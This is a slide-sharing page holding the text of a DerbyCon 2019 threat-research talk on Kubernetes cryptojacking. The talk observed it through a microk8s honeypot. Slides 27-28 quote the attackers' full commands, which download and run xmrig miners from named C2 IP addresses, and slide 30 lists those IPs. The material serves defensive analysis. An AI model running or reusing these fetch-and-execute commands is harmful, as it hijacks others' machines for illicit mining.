Download as PDF, PPTX
Uploaded byLacework
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty
The document details a presentation by James Condon at DerbyCon 2019 about cybersecurity threats related to Kubernetes, specifically focusing on cryptojacking incidents and vulnerabilities within Kubernetes clusters. It outlines the process of setting up a honeypot to observe attacks, describes the types of exploits found, and presents findings on compromised pods and command patterns indicative of cryptojacking. The conclusion emphasizes that cryptojacking is just a glimpse of potential broader attacks that could pivot to cloud service providers.
More Related Content
Similar to DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty
![[BDD 2025 - Mobile Development] Exploring Apple’s On-Device FoundationModels](https://cdn.slidesharecdn.com/ss_thumbnails/md-exploringappleson-devicefoundationmodels-251124030840-d690542c-thumbnail.jpg?width=640&height=640&fit=bounds)
![[DevFest Strasbourg 2025] - NodeJs Can do that !!](https://cdn.slidesharecdn.com/ss_thumbnails/devfeststrasbourg2025-nodejscandothat-251127142731-da65b6fd-thumbnail.jpg?width=640&height=640&fit=bounds)
![[BDD 2025 - Artificial Intelligence] Building AI Systems That Users (and Comp...](https://cdn.slidesharecdn.com/ss_thumbnails/ai-buildingaisystemsthatusersandcompanieslove-251124030845-038f7732-thumbnail.jpg?width=640&height=640&fit=bounds)
![Support, Monitoring, Continuous Improvement & Scaling Agentic Automation [3/3]](https://cdn.slidesharecdn.com/ss_thumbnails/agenticcommunityseries-day3-cfd-251120170304-ddef8112-thumbnail.jpg?width=640&height=640&fit=bounds)
![[BDD 2025 - Artificial Intelligence] AI for the Underdogs: Innovation for Sma...](https://cdn.slidesharecdn.com/ss_thumbnails/ai-aifortheunderdogsinnovationforsmallbusinesses-251124030839-72a599a4-thumbnail.jpg?width=640&height=640&fit=bounds)
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty
- 1. @laceworklabs Prepare to beBoarded! A Tale of Kubernetes, Plunder, and Cryptobooty James Condon DerbyCon 2019
- 2. @laceworklabs cryptobooty cryp • to• boo • ty /ˈkriptō bo͞odē/ noun Cryptocurrency obtained from illicit coinmining in a Kubernetes cluster.
- 3. @laceworklabs whoami • James Condon,Director of Research @ Lacework • Former USAF OSI, Mandiant, and ProtectWise • Network Forensics, Incident Response, Threat Intelligence, Cloud Security TwiIer: @laceworklabs, @jameswcondon Email: james@lacework.com Blog: www.lacework.com/blog/
- 4.
- 5.
- 6. @laceworklabs Master API Server etcd Scheduler Control Manger Node Kubelet Pod1...n Node Kubelet Pod 1...n UI Dashboard CLI BASIC ARCHITECTURE
- 7.
- 8.
- 9.
- 10. @laceworklabs 500 2,400 21,000 600 DASHBOARDSETCD CLUSTERS API SERVERS (SECURE) API SERVERS (INSECURE)
- 11.
- 12. @laceworklabs CURIOUS ABOUT K8sATTACKS • Based on exposure we discovered, how is it exploited? • K8s is relaVvely newer, how long will compromise take? • Whats the best way to setup our honeypot? • Is there any other reporVng we can find?
- 13.
- 14.
- 15. @laceworklabs WHAT IS MICROK8s? •Single-node K8s cluster. • Very easy to setup • Use it for offline development, prototyping, testing, or use it on a VM as a small, cheap, reliable k8s for CI/CD.
- 16. @laceworklabs SETTING UP OURHONEYPOT • Spin up Ubuntu Server • Install microk8s via snap • Enable Kubernetes dashboard and DNS • Check insecure api is accessible • Expose instance to allow all traffic • Start tcpdump trace for interesting ports • DISCLAIMER: microk8s is NOT intended to be used like this
- 17. @laceworklabs THE ATTACK • Expectedan attack with 24 hours, ended up being 31 days! • Dashboard left untouched • Lots of general internet scanning, nothing k8s specific
- 18.
- 19.
- 20.
- 21.
- 22.
- 23. @laceworklabs THE ATTACKERS • C2IP • Reported by mulVple security vendors • Reported in private security research • MulVple Ves to 8220 Gang • Used in various Cryptojacking aIacks (outside K8s) • Monero Address & Mining Pools • Reported in various Cryptojacking campaigns including Kubernetes aIacks
- 24.
- 25. @laceworklabs SCANNING FOR INSECUREAPIs - IPs • At time of research, 678 IPs in censys search for insecure APIs • Mostly TCP port 8080 & 443 • Primarily Amazon, GCP, OVH, Tencent, & Alibaba • US, China, Germany, and Ireland
- 26. @laceworklabs SCANNING POD CONFIGs •10,743 Pods • Common Pod names: mi125yap*, y1ee115-*, y1ee114-* • Common Labels & Container names: myresd02 & myresd01 • Most popular image: centos
- 27. @laceworklabs CONTAINER COMMANDS INDICATIVEOF COMRPOMISE curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/222.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;./xmrig -c config.json curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json
- 28. @laceworklabs CONTAINER COMMANDS INDICATIVEOF COMRPOMISE curl -o /var/tmp/config.json http://158.69.133.18:8220/222.json;curl -o /var/tmp/suppoie1 http://158.69.133.18:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /var/tmp/xmrig.tar.gz;tar -xzvf xmrig;curl -o /var/tmp/config.json http://202.144.193.159/222.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;./xmrig -c config.json
- 29.
- 30. @laceworklabs C2 IPs • 202.144.193.159 •Seen in our honeypot • Two different download methods • Not much open source reporting • 192.99.142.232 • Seen in prior microk8s reporting • Uses suppioe naming, and 8220 gang TTPs • 158.69.133.18 • Seen in “Drupalgeddon” aIacks • Uses suppioe naming, and 8220 gang TTPs
- 31. @laceworklabs FINAL THOUGHTS • Cryptojackingis the Vp of the iceberg • There is much more an aIacker could do in these scenarios…such as pivoVng to the cloud service provider
- 32. @laceworklabs resources 1. Tesla ExposedDashboard https://redlock.io/blog/cryptojacking-tesla 2. Lacework Containers at Risk Report https://info.lacework.com/hubfs/Containers%20At- Risk_%20A%20Review%20of%2021,000%20Cloud%20Environments.pdf 3. Exposed etcd Clusters Blog https://elweb.co/the-security-footgun-in-etcd/ 4. Lacework exposed etcd Clusters Blog https://www.lacework.com/etcd-thousands-of-clusters-open/ 5. Kubernetes Illustrated Children's Guide: https://youtu.be/4ht22ReBjno 6. An overview of MicroK8s (a tool to quick-start a Kubernetes cluster) and why using it in the cloud was a terrible idea (https://medium.com/faun/an-overview-of-microk8s-and-why-using-it-in-the-cloud-was-a-terrible-idea- 9ba8506dc467) 7. Suppoie Crypto Hijack (https://blog.infostruction.com/2018/04/24/suppoie-crypto-hijack/) 8. Cryptojacking Campaign Targets Exposed Kubernetes Clusters (https://www.lacework.com/cryptojacking- targets-exposed-kubernetes-clusters/) 9. MicroK8s PR - Get most services out of the default interface (https://github.com/ubuntu/microk8s/pull/88)
- 33. @laceworklabs QUESTIONS Twitter: @laceworklabs, @jameswcondon Email:james@lacework.com Blog: www.lacework.com/blog/